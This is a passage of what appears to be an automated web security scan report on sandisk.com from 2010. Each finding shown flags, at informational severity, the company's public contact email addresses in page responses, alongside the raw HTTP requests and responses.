Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37806
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:webmaster@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:shopsandisksupport@sandisk.com?subject=Sandisk%20Store">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a><br />
EMEA - <a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a><br />
Japan - <a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a><br />
Korea - <a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.69. http://www.sandisk.com/about-sandisk/privacy-policy/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/privacy-policy/faq

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/privacy-policy/faq HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/privacy-policy
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22840
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a href="mailto:privacy@sandisk.com">
...[SNIP]...
<a
href="mailto:privacy@sandisk.com">privacy@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-la@sandisk.com">privacy-la@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-EMEA@sandisk.com">privacy-EMEA@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-japan@sandisk.com">privacy-japan@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-korea@sandisk.com">privacy-korea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:privacy-asia@sandisk.com">privacy-asia@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.70. http://www.sandisk.com/about-sandisk/procurement--global-supply-base-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/procurement--global-supply-base-management

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/procurement--global-supply-base-management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16434
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.71. http://www.sandisk.com/about-sandisk/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/terms-of-use

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/terms-of-use HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24872
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:Dmca-agent@sandisk.com">Dmca-agent@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.72. http://www.sandisk.com/about-sandisk/worldwide-locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/worldwide-locations HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18850
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.73. http://www.sandisk.com/about-sandisk/worldwide-locations/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/worldwide-locations/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18851
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.74. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk--israel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk--israel

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/worldwide-locations/sandisk--israel HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17497
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.75. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-asia-pacific  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk-asia-pacific

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/worldwide-locations/sandisk-asia-pacific HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19002
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.76. http://www.sandisk.com/about-sandisk/worldwide-locations/sandisk-europe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/worldwide-locations/sandisk-europe

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/worldwide-locations/sandisk-europe HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/worldwide-locations
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17540
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.77. http://www.sandisk.com/business-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35895
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.78. http://www.sandisk.com/business-solutions/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business-solutions/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15607
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com&nbsp;">OEMsales@sandisk.com&nbsp;</a>
...[SNIP]...
<a
href="mailto:dl-OEMsaleseurope@sandisk.com">dl-OEMsaleseurope@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.79. http://www.sandisk.com/business-solutions/embedded-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/embedded-products HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.80. http://www.sandisk.com/business-solutions/embedded-products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/embedded-products.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37549
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.81. http://www.sandisk.com/business-solutions/embedded-products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products/

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/embedded-products/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37545
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.82. http://www.sandisk.com/business-solutions/embedded-products/inand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/embedded-products/inand

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/embedded-products/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/embedded-products
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.83. http://www.sandisk.com/business-solutions/find-a-distributor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/find-a-distributor

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/find-a-distributor HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ysssvz55hrpsoeep5niw5145; path=/; HttpOnly
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.84. http://www.sandisk.com/business-solutions/flash-memory-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38741
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.86. http://www.sandisk.com/business-solutions/flash-memory-cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/compact-flash-cards

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards/compact-flash-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37476
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/memory-stick-pro-duo

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards/memory-stick-pro-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36650
